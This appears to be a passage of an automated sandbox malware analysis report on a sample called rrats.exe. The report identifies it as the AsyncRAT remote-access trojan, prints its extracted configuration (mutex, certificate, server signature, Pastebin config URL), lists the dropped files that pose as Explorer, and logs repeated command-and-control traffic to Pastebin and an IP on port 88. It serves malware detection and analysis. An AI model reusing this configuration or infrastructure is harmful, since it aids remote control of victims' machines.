                        Source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpMalware Configuration Extractor: AsyncRAT {"Mutex": "RRAT_nMo7Zfs0N", "Certificate": "MIIE8jCCAtqgAwIBAgIQAP1hzmrgL5qNkPrA8fqq+zANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjAwNTA3MTgyNTI2WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIIo9I64dBM7+4GawVLepf4oWhJAOY/dJ4gs5A8ivFPxJKpcXVNbUAF3J8kQGcQXQ9rP3T9mI6kK9FQVIHkQHkQ9CujdjULUw48/DnhM6TxtZKGAPNMceY6UjTOmvEASzwOzsIG16akW9RY2S4wbu2VRg7rkU9eiY3rtqt16/eJZgVZHWiO4hjkNgUyJCbkgxceew6xcmqQFaSAAcohOdaUJepuO6LLkt+rbwLIlCASIvM53oqu2eNL8Xk5/2bP2dhKTBfX/aD9xsfAN1BacEg5QcmwZgOeP8JJUC3nWLwXq8tRMPeTPYp9veHaQn9wWst6Rm3rDAh5bYbLxWNj4wi1stiAJ0yk0/+XXL5IQyCPfW/Q5oFYw+hhDiGFJQfim2ZfBvOjjoPVDdovpWp90c87gaiWGZbzLSedTomNfGcC36wUagtkKBXPFbcv4eWIXoPdwSjPk5LgJKgY+0g8iOCzawN9vIzUmkb3LPDwiluIqCOvqmUeAlrkthBhFJCOdfylNa3h4yDAsaZ+skQJle/YoF8AjBn0xAXsX1Q67/FSRUNDosuU+dqIZrii7jP8Qqc2F663sGamumrSAl3PXBL+UhVYoqkQqZG/D6e4qllcwH+dXBB27TMqY3b+xCv+slaraW2OIpYLQvTxGurpRF+BiCClZ9R0saYV2aSHBJW0rAgMBAAGjMjAwMB0GA1UdDgQWBBSjj9Cw11x4A95sxB4xy2LBe/0D8DAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBx9/VPQZFmIlqEl6QlR1lrToLbBdvksyr90Q/6LdGj9jlFfYpuzJjoSZ6UWYXifwEPHAIuaEqAzb91WeRkLgW6foTLlOOMu7fGFxi895huFT/QKfSUiKIRNxS8sM+/vBBz3YtvhehQaabSomOzl93/V5VJDt0e3xaANUeuVmnUlE1OMWWM0qRrGJtd7F8fE5Uk/rh7gIA/o8maQECpxpyHL1KTdcxdC3B+GyNQHYqiU9F/wRK5Zpx1+3YJ7162KhWtpzlm8iaVQToY3k8GPZkwj8sDRkuPpCzhDw3aHNtsAQmY0JEjBJcPAVCZ+/VzSboE+auT58BjwUf2DQRi2Xzh2jc/G08yvViXL4N88ZnK9QTiyMi50TFHBiqIizfDHL2YDJg2XpatRul49SPTxmIuwUt/3Wljz3kn/UM8MpcXPZbbzZMIYPjTiBqo9DijlBa/6JP4gtfzmgz6LCSv4wRGKR/9/Xkese/mE43zVLZopDMDn3tiPq8jobJ+2UAmm/V4WeRu3SiVn54aalDW3y9aWXpJhBXhldW+mF3q596n79OZDUNHZeor1Q3IFrXHZ/7zv9gk6Y5H96aQYUSEchAJikxVPk9Y5fygR16QG0U9sx0+7vTots9ioqvm7XMa+5xfZ+qk35RuiNqSlOY66mLEO0vex8cFFp3rvGj89VqD4g==", "Server Signature": "ZAEVYE4+WDbUbphyNWIlYDNiT/0G1m9oCuNRmqApkPq6DK43FO9IDy0E8zAIsJqQGMPgP1NzlXR2kcsyXklHOExDxYS3BgDNGipVUm+7oBSM9xIUV90aAwMlMzGtD/d5LKJ50z3PIis8Nj9WXzSPSL1/AbQ9Lq13L9V7jdRZiDkVQb2sLWoUErXM4eM0zmtCIpvRbO6yvBr/zUh3mKmOtugjkXGwE7CMEWCCB4fnfJm4tKYpDle+WxRa/ZfioEFdHTi9ZgzDLBvOWbQZWJMVvrlkXNZ7ENh/Ugpd+1rggG0z06CRTxmnEULOb+ej2kTU57iWbicoZRsme2t5XSwWmnD6OTmX1/mlgn9YnRFiqiL1GZlkNhXSuLUMELD7FV3L7xO86rjZLt8dX+BrHCZCzFF+3yzI7IEnpIf5Lmr+Q29LgsdB+ZUeCIBGnJ8GinuDNlijxi9AWzYj3Nmukgv2ltukS1k8021CWQu6TRKJXURqrECPkCwdt4z8i3A/3ojdz9AwFyK4tXUop7fkL++8lwinbMBXgxDLcXd/y+nmv34okEGRYMH5VUz1v6QIrfHhyYHSiQ7NqQ5953KaE+u9FN0JXCtZxmd2WiW/aoYw3ob7HIexuk0ytURxvG52YyVfdMuzhqe9QDc8U4MkkkOO4eQK2F/5q/iG99dyHrKwVek=", "External_config_on_Pastebin": "http://pastebin.com/raw/hbwHfEg3"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeReversingLabs: Detection: 81%
                        Source: C:\Users\user\AppData\Local\explore.exeReversingLabs: Detection: 81%
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeReversingLabs: Detection: 81%
                        Multi AV Scanner detection for submitted file
                        Source: rrats.exeReversingLabs: Detection: 44%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\explore.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeJoe Sandbox ML: detected
                        Source: rrats.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49705 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49769 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49894 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50024 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50031 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50032 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50035 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50038 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50058 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50059 version: TLS 1.2
                        Source: rrats.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: rrats.exe
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: rrats.exe, 00000000.00000003.2025471553.0000000007875000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000004.00000000.2030069537.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp, a.exe, 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp, a.exe.0.dr
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CAA69B
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CBC220
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CCB348 FindFirstFileExA,0_2_00CCB348
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E82AF9 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,4_2_00E82AF9
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E91260 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,4_2_00E91260
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E9FCC8 FindFirstFileExA,4_2_00E9FCC8

                        Networking

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeNetwork Connect: 104.20.4.235 443Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeNetwork Connect: 172.67.19.24 443Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeNetwork Connect: 194.67.204.7 88Jump to behavior
                        Connects to a pastebin service (likely for C&C)
                        Source: unknownDNS query: name: pastebin.com
                        Source: unknownDNS query: name: pastebin.com
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rrat.exe.26db1a0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\explore.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPED
                        Source: global trafficTCP traffic: 192.168.2.5:49706 -> 194.67.204.7:88
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                        Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                        Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                        Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewASN Name: IHOR-ASRU IHOR-ASRU
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49760 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49836 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49911 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49959 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50010 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50023 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50021 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50054 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50053 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50030 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50033 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50026 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50036 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50028 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50047 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50039 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50056 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50057 -> 172.67.19.24:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49869 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49819 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49795 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49994 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49844 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49894 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49968 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49942 -> 172.67.19.24:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49919 -> 172.67.19.24:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.67.204.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.67.204.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.67.204.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.67.204.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 194.67.204.7
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/hbwHfEg3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /raw/KKpnJShN HTTP/1.1Host: pastebin.com
